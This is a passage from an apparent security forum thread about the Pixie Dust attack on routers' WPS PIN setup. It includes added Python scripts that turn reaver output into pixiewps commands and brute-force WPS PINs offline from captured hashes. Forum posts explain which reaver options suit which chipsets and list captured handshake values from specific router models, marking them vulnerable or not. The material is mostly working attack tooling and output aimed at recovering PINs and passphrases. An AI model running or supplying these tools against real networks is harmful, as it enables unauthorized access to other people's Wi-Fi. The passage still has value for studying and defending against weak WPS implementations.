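        m = LINE_RE.match(line)
        if not m or m["name"] not in FIELDS:
            continue                                   # e.g. "[P] WPS Manufacturer: ..."
        raw = m["hex"].replace(" ", "").replace(":", "")   # undo wrapping
        data = bytes.fromhex(raw)
        want = FIELDS[m["name"]][1]
        if len(data) != want:
            raise ValueError(f"{m['name']}: {len(data)} bytes, expected {want}")
        fields[m["name"]] = data
    return fields


def pixiewps_argv(fields: dict) -> list:
    """Build the pixiewps argument vector; raises if a required input is missing."""
    required = ("PKE", "PKR", "AuthKey", "E-Hash1", "E-Hash2")
    missing = [n for n in required if n not in fields]
    if missing:
        raise ValueError("missing fields: " + ", ".join(missing))
    small_dh = fields["PKR"] == SMALL_DH_PKR
    argv = ["pixiewps"]
    for name, data in fields.items():
        if name == "PKR" and small_dh:
            continue                                   # -S tells pixiewps PKR = 2
        argv += [FIELDS[name][0], colon_hex(data)]
    if small_dh:
        argv.append("-S")
    return argv


def wrap_like_forum(s: str, width: int = 50) -> str:
    """Mimic the wrapping that puts a space every `width` characters into pasted hex."""
    return " ".join(s[i:i + width] for i in range(0, len(s), width))


# Constructed sample transcript: synthetic byte patterns, not from any real AP.
SAMPLE_PKE = bytes(range(192))
SAMPLE_AUTHKEY = bytes(range(32))
SAMPLE_EHASH1 = bytes(range(32, 64))
SAMPLE_EHASH2 = bytes(range(64, 96))
SAMPLE_ENONCE = bytes(range(16))
SAMPLE_OUTPUT = f"""\
[+] Trying pin 12345670.
[P] E-Nonce: {colon_hex(SAMPLE_ENONCE)}
[P] PKE: {wrap_like_forum(colon_hex(SAMPLE_PKE))}
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[+] Received M1 message
[P] PKR: {wrap_like_forum(colon_hex(SMALL_DH_PKR))}
[P] AuthKey: {colon_hex(SAMPLE_AUTHKEY)}
[+] Sending M2 message
[P] E-Hash1: {colon_hex(SAMPLE_EHASH1)}
[P] E-Hash2: {colon_hex(SAMPLE_EHASH2)}
"""

if __name__ == "__main__":
    print(shlex.join(pixiewps_argv(parse_reaver_output(SAMPLE_OUTPUT))))
```

The length check is the part worth keeping even if the rest is replaced by the reaver fork's built-in hand-off: a PKE or PKR that came out of a paste one byte short will make pixiewps report "WPS pin not found" on a router that is in fact vulnerable.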

  33. #233
    Join Date
    2015-Apr
    Posts
    9
    We would like, if possible, a method to add more routers. Thanks @soxrok2212

  34. #234
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then use the corresponding -K 1,2,3 argument.

  35. #235
    Join Date
    2015-Apr
    Posts
    9
    soxrok2212, thanks for your work, but on the TD5130 and TG589 V3 routers it doesn't work, and we want the method you are using to put routers in pixiewps.

  36. #236
    Join Date
    2013-Oct
    Posts
    321
    @ Quest

    I heard your call matey, Guess I'll be adding it to FrankenScript. :-)
    Last edited by slim76; 2015-04-18 at 12:28.

  37. #237
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then use the corresponding -K 1,2,3 argument.
    Hello matey,

    Any idea what -K option should be used with what chipsets?

  38. #238
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by slim76 View Post
    Hello matey,

    Any idea what -K option should be used with what chipsets?
    Yeah, I just sent a message to t6_x, I think we will be removing those options to make it much simpler. I don't really understand it right now either but I guess I can try...

    Code:
    The -K option 1 runs pixiewps without PKR and the e-s1 = e-s2 = 0
    The -K option 2 runs pixiewps without PKR and the e-s1 = e-s2 = 0 but using the -n option of pixiewps (E-Nonce)
    The -K option 3 runs pixiewps with PKE, PKR and the hash1 = hash2 = e-nonce
    1 should be used with Ralink and -S used in reaver
    2 should be used with Broadcom and -S used in reaver
    3 is for Realtek and -S is NOT used in reaver (realtek isn't finished yet... it has worked for me but other users report failures)
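
What the -K cases in post #238 and the Realtek note in post #229 (E-S1 = E-S2 = E-Nonce when the exchange fits in one second) have in common is that the enrollee's secret nonces E-S1/E-S2 are guessable, which turns E-Hash1 and E-Hash2 into offline oracles for the two halves of the PIN. The code below is an added example written for this page, not pixiewps's or the reaver fork's code, that runs that offline search on the values reaver prints. It assumes the WPS derivations from the specification (PSK1/PSK2 are the first 128 bits of HMAC-SHA256(AuthKey, ASCII pin half); E-Hash1 = HMAC-SHA256(AuthKey, E-S1 || PSK1 || PKE || PKR), likewise for E-Hash2) and tries two guesses for the nonces: all zero (the "-K 1" case) and E-S = E-Nonce (the Realtek same-second case). The Broadcom PRNG-seeded case behind "-K 2" is not implemented. All inputs are constructed; the hashes are generated by a simulated leaky enrollee with the PIN 12345670, the default PIN reaver tries first above.

```python
"""
Offline Pixie Dust PIN recovery from one captured WPS M1/M2/M3 exchange.
Added example for this page; not pixiewps or reaver code.

    PSK1    = HMAC-SHA256(AuthKey, pin[0:4])[:16]
    PSK2    = HMAC-SHA256(AuthKey, pin[4:8])[:16]
    E-Hash1 = HMAC-SHA256(AuthKey, E-S1 || PSK1 || PKE || PKR)
    E-Hash2 = HMAC-SHA256(AuthKey, E-S2 || PSK2 || PKE || PKR)

With E-S1/E-S2 known, the halves are independent searches of 10^4 and 10^3
candidates instead of the 10^7 an online attack would face.
"""
import hashlib
import hmac


def wps_pin_checksum(pin7: int) -> int:
    """Checksum digit that extends a 7-digit WPS PIN to 8 digits (odd positions weigh 3)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def psk_half(authkey: bytes, pin_half: str) -> bytes:
    return hmac.new(authkey, pin_half.encode("ascii"), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, e_s: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    return hmac.new(authkey, e_s + psk + pke + pkr, hashlib.sha256).digest()


def recover_pin(authkey, pke, pkr, e_hash1, e_hash2, e_nonce):
    """Return (pin, guess_label), or None when neither E-S guess explains the hashes."""
    guesses = [("es=zero", bytes(16), bytes(16)),        # -K 1 style
               ("es=e-nonce", e_nonce, e_nonce)]          # Realtek same-second case
    for label, es1, es2 in guesses:
        first = None
        for i in range(10_000):                           # first half: 4 free digits
            half = f"{i:04d}"
            if e_hash(authkey, es1, psk_half(authkey, half), pke, pkr) == e_hash1:
                first = half
                break
        if first is None:
            continue                                      # wrong E-S1 guess, skip second half
        for j in range(1_000):                            # second half: 3 free digits + checksum
            second = f"{j:03d}{wps_pin_checksum(int(first) * 1000 + j)}"
            if e_hash(authkey, es2, psk_half(authkey, second), pke, pkr) == e_hash2:
                return first + second, label
    return None


# Constructed test vector, not captured from any real AP. PKR is the small DH
# public key 2 that reaver -S sends, which is why the outputs above end in :00:02.
DEMO_AUTHKEY = hashlib.sha256(b"demo authkey").digest()          # 32 bytes
DEMO_PKE = hashlib.sha256(b"demo pke").digest() * 6             # 192 bytes
DEMO_PKR = bytes(191) + b"\x02"                                 # 192 bytes
DEMO_ENONCE = hashlib.sha256(b"demo e-nonce").digest()[:16]     # 16 bytes
DEMO_PIN = "12345670"                                           # 1234567 + checksum 0


def demo_hashes(es1: bytes, es2: bytes):
    """What a leaky enrollee would put in M3 for DEMO_PIN with the given E-S values."""
    h1 = e_hash(DEMO_AUTHKEY, es1, psk_half(DEMO_AUTHKEY, DEMO_PIN[:4]), DEMO_PKE, DEMO_PKR)
    h2 = e_hash(DEMO_AUTHKEY, es2, psk_half(DEMO_AUTHKEY, DEMO_PIN[4:]), DEMO_PKE, DEMO_PKR)
    return h1, h2


if __name__ == "__main__":
    h1, h2 = demo_hashes(bytes(16), bytes(16))
    print(recover_pin(DEMO_AUTHKEY, DEMO_PKE, DEMO_PKR, h1, h2, DEMO_ENONCE))  # ('12345670', 'es=zero')
```

The search order matters for the lockout concern raised in post #229: everything here runs on values from a single exchange, so a wrong guess about E-S1/E-S2 costs CPU time only, never another WPS attempt against the AP. An enrollee whose E-S1/E-S2 come from a real random source makes both guesses fail and the function returns None, which is what the "WPS pin not found" lines above mean.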

  39. #239
    Join Date
    2015-Mar
    Posts
    127
    Yeah, agreed. I suggested this idea to t6_x on his thread.

    Just have reaver/pixie try all three attacks. The user just wants the pin/passphrase quickly and doesn't really care how. If the user really wants to know which attack the AP was vulnerable to, let him use --vvv.

  40. #240
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    @ Slim, great but don't move too quick, this is still in dev with improvements on the horizon, and the next Kali might be using different programs(?) like another Aircrack-ng https://bugs.kali.org/view.php?id=2219 for example. That might change a thing or two or maybe not.

    Anyways good to see you back and a new Franken looming [thumb up emoticon here]

  41. #241
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    Yeah, I just sent a message to t6_x, I think we will be removing those options to make it much simpler. ...
    Cheers for the info matey, its made things much clearer for me. :-)
    Cheers again for all your hard work, its greatly appreciated.

  42. #242
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Quest View Post
    @ Slim, great but don't move too quick, this is still in dev with improvements on the horizon ...
    Yeah, to be honest, I'd wait another week or two at least. Doing A LOT of work and there are still a lot of bugs to be ironed out. Anyways, I was thinking about starting a giant group-dev chat on Skype...? It would make communication a lot faster and info could be shared much much quicker. If you want to add me, my Skype is robert.jor49. I'm already in contact with a few of you guys, but there's still a few of you who are not there.

  43. #243
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by Quest View Post
    @ Slim, great but don't move too quick, this is still in dev with improvements on the horizon ...
    I thought things would change a little, it shouldn't be much of an issue; worst case I'll have to rewrite the pixie attack in FrankenScript.
    I'm hoping to upload a temporary version of FrankenScript within the next few days if all goes well.

    Is it worth getting FrankenScript to print out the results of the pixie dust attacks with the Pin & Passphrase, or should it just print the Pin & Passphrase?

  44. #244
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by slim76 View Post
    Is it worth getting FrankenScript to print out the results of the pixie dust attacks with the Pin & Passphrase?, or should it just print the Pin & Passphrase?.
    Uhhhhh... what? Do you mean pixiewps's pin and then reaver's output? -- If so, just have it print the pin and passphrase from reaver.

  45. #245
    Join Date
    2013-Oct
    Posts
    321
    I just noticed something about the install of pixiewps, the install directory is different for different install methods.

    apt-get installs pixiewps to: /usr/bin
    make & make install installs pixiewps to: /usr/local/bin

    Does anyone know if reaver-wps-fork-t6x & reaver from the kali repo will detect pixiewps in either/both locations?

  46. #246
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    Uhhhhh... what? Do you mean pixiewps's pin and then reaver's output? -- If so, just have it print the pin and passphrase from reaver.
    Sorry, I meant details like the PKR, PKE, EHash, chipset and such.

  47. #247
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by slim76 View Post
    Sorry, I meant details like the PKR, PKE, EHash, chipset and such.
    Oh. Chipset/Model number/Manufacturer yes, the rest, no... just in case they want to report their findings

  48. #248
    Join Date
    2015-Apr
    Posts
    1
    Hello
    This site is in German. I hope this site helps with DLINK and Speedport.
    https://www.wardriving-forum.de/wiki...ardpasswörter

  49. #249
    Join Date
    2015-Apr
    Posts
    15
    Some new Signatures (tested with all 4 possible pixiewps option-combinations)

    NOT VULNERABLE:

    Code:
    ASUS RT-N66U
    Broadcom BCM4706
    
    [P] E-Nonce: 01:5a:54:01:c1:db:32:e5:2b:33:fd:bb:8c:9d:f0:9e
    [P] PKE: 8c:09:51:62:1f:45:31:98:32:a0:fc:58:0e:d5:ed:36:86:c4:b5:ab:7c:8c:c7:30:67:40:a9:ff:e7:62:8f:9b:7d:1c:31:d4:95:96:ce:ea:5b:b3:43:ba:d2:f7:12:8d:8e:48:01:fd:8c:0c:12:17:53:e7:aa:29:9b:9a:06:31:4f:73:e5:78:cc:b8:7e:99:26:1d:be:db:cb:69:45:f3:19:21:df:ab:cd:91:b5:d7:94:7d:83:b9:9e:b8:b5:55:61:ac:c2:78:17:f5:92:01:d4:a6:ed:fe:82:2f:83:23:87:05:5d:69:18:97:9e:c6:6f:34:cb:02:e2:a0:51:d1:18:24:c3:cc:7c:d7:ab:80:93:95:b6:48:ea:92:53:5a:96:6a:f9:4d:3e:a5:07:6d:4f:6a:20:cd:bf:5b:e0:b5:dc:b2:f1:55:17:43:7b:2c:26:0a:d2:05:ba:3a:87:da:dd:63:5c:5d:27:f7:84:4d:47:4a:b2:59:6a:3e:43:9b
    [P] PKR: ae:55:61:51:7b:8d:b4:33:40:4b:18:75:f2:28:2f:5b:eb:68:17:2e:c3:d6:2b:c0:6e:9e:67:fb:82:10:c5:36:d3:b3:86:77:09:bd:fd:5d:fe:7d:8d:29:1b:c2:81:65:9d:8e:f9:88:fa:a7:49:20:3e:f1:ae:61:d6:16:f8:02:53:40:d6:bc:07:f8:b4:93:39:33:e4:77:58:10:57:04:dd:2c:01:db:40:87:96:61:f8:42:61:97:95:2a:aa:64:d8:8a:98:f7:82:5c:f7:d6:db:04:f3:0c:b9:0b:b0:b2:ad:d7:92:92:b3:7c:30:fc:76:e2:f5:d7:76:73:54:7c:74:21:61:db:91:53:94:f7:f4:24:4c:5d:f5:8c:7f:e3:4e:5d:5f:36:79:bb:a7:37:ac:6c:66:c5:b4:84:bd:b1:66:1f:eb:94:96:e7:6e:18:a3:1e:64:b5:df:4c:7e:ef:44:30:a1:08:f3:7e:59:df:38:d1:2b:71:d4:3e:3e:cc
    [P] AuthKey: 0f:7f:32:3f:65:e4:3d:8d:b2:35:2d:a1:12:e7:3b:3c:f6:65:44:8e:13:16:85:e5:8e:14:82:83:66:7b:48:d2
    [P] E-Hash1: 8d:53:7e:3c:cf:24:16:77:c6:6e:f4:09:dc:b7:18:44:a3:19:98:e8:c5:ce:5a:ed:b2:70:db:55:b5:ab:6e:b4
    [P] E-Hash2: 28:29:96:3e:0e:33:87:0a:a4:90:17:9d:97:3a:10:7a:6b:f3:44:52:5f:2f:a6:8c:3b:23:96:19:c5:b5:e8:94
    NOT VULNERABLE:

    Code:
    NETGEAR WN3100RP (WiFi-Repeater)
    
    [P] E-Nonce: ad:d5:5c:93:e2:e9:c1:59:87:ad:27:13:76:58:bf:32
    [P] PKE: d0:0b:9a:f7:6d:aa:44:d9:7a:56:63:04:52:8b:39:e8:44:67:8b:99:3f:4c:70:b8:36:df:95:bf:3f:91:f7:89:37:c8:b2:1d:df:7b:43:0f:a6:06:99:a0:20:45:06:f9:ca:a6:be:f4:cc:e2:68:bf:c8:db:0e:75:b6:e4:a8:0a:ab:5a:3f:d2:29:08:39:84:0c:87:85:29:7f:e2:0f:86:53:05:c0:1a:35:fd:2d:40:c9:4d:00:41:8f:f4:9f:2b:48:71:3e:53:95:ac:ac:e6:97:68:a9:9f:11:f0:fb:2c:1b:4f:0f:24:e3:03:3a:f5:e9:94:10:99:aa:5e:6c:5f:2f:68:ef:02:77:7b:bf:0c:c1:05:bc:96:4d:d8:2b:1d:34:7e:b8:c7:a5:3c:2f:e4:31:40:60:24:98:5d:3f:0c:53:b1:1f:e3:53:76:31:90:b4:60:73:17:ae:8b:f9:1c:f9:33:d0:84:f8:cb:3c:ad:38:01:14:79:2d:bb:6e:90
    [P] PKR: ab:a4:18:77:a4:9e:d8:05:e2:a3:bb:ae:b6:bf:06:a5:71:a9:02:78:8a:65:ba:76:15:ff:59:14:a3:49:f4:a0:c3:09:f1:fe:58:50:e1:da:7a:dc:fc:90:9f:4e:84:b6:dc:04:b9:50:ac:fe:a0:22:4e:64:7d:ec:d5:2d:cf:20:29:d9:37:48:8d:cc:4b:3e:2b:b8:3b:af:e6:77:c8:2c:f7:33:04:ef:48:61:3c:ba:93:ec:e0:31:61:80:4b:b4:c4:9d:6f:8b:7b:71:19:41:c8:8f:66:83:b3:26:dc:3f:0c:0d:e9:0a:ee:1e:1b:65:c3:67:c3:16:7c:16:1a:30:8b:bc:48:bb:ec:18:93:71:74:17:ef:3f:ea:ad:04:71:59:6b:2e:7d:ca:74:0a:0b:1a:73:5c:cd:14:08:e6:0a:07:40:dd:d1:ca:f3:cc:47:ad:93:cf:c6:67:8b:fa:25:b0:55:dc:22:5f:a0:32:60:60:96:dc:d0:a2:10:f9:71
    [P] AuthKey: 9e:fe:ad:05:13:1c:67:c1:d4:fa:ab:70:03:92:b4:d2:b8:76:ad:85:f8:c8:39:b4:fb:fe:2d:aa:fc:ed:b0:d1
    [P] E-Hash1: ae:a9:02:51:13:d3:56:4d:e8:1c:71:88:bf:ab:a7:71:90:08:3d:98:4f:47:1d:f7:40:39:e9:65:08:5d:05:aa
    [P] E-Hash2: 45:01:86:0d:b0:2c:17:4a:32:2e:a0:d7:ca:8b:3d:ca:61:a6:eb:32:7c:2d:e5:aa:9e:4f:c4:3f:c3:de:e2:79
    Code:
    VULNERABLE:
    
    NETGEAR JNR3210
    Realtek RTL8198
    
    [P] E-Nonce: 34:5c:4d:63:39:13:1f:67:75:51:78:8b:70:67:6e:46
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: f2:da:93:b1:d1:6e:89:65:e6:a4:c7:a6:c6:bf:1b:80:dc:56:c5:47:d7:09:13:ba:7e:c5:96:c4:e8:a1:59:b7:5e:bb:d9:67:b8:2a:24:7a:53:9a:e0:16:2d:e8:f0:cb:a6:fe:ab:70:82:bb:17:86:47:7d:05:de:06:b8:18:2b:79:7a:3f:75:95:06:bc:12:06:a1:64:45:00:3c:0a:da:c9:0b:b8:22:31:e6:54:d0:83:a5:88:45:f9:13:0f:3f:82:de:22:9f:04:e1:26:93:2c:49:22:00:2d:7b:74:4e:a0:29:16:a3:96:c8:08:6b:5f:c0:eb:89:49:5c:1f:d0:a7:cf:33:c5:70:65:cc:1d:dc:f9:c4:7b:28:68:03:a2:5a:71:21:c4:0b:80:13:44:3c:e0:9b:be:17:7a:94:6a:9c:00:f2:8c:de:96:09:51:97:57:4b:bd:17:cf:b7:fe:8d:c1:9c:05:85:29:7a:ff:87:81:59:02:97:0f:f3:0d
    [P] AuthKey: b4:20:25:cc:17:81:35:11:da:37:21:aa:5b:2c:21:02:17:a0:6a:0c:d1:1c:c0:21:5e:9a:a6:ca:8e:b2:32:b8
    [P] E-Hash1: 02:31:ef:e0:30:00:9b:28:db:18:b6:1b:77:5d:b7:20:fb:0c:8a:b5:7e:41:85:33:dd:83:ae:94:4f:7a:5a:fe
    [P] E-Hash2: 61:39:79:0c:67:a7:c3:2f:b0:10:98:5e:16:61:7b:e0:a6:a8:73:1f:84:bb:78:34:0c:22:64:03:cb:cc:f0:73
    Last edited by someone_else; 2015-04-20 at 08:55. Reason: Failure in Model-Number

  50. #250
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by someone_else View Post
    Some new Signatures (tested with all 4 possible pixiewps option-combinations) ...
    Sweet thanks! I see you found Realtek AP and had success!! Congrats!
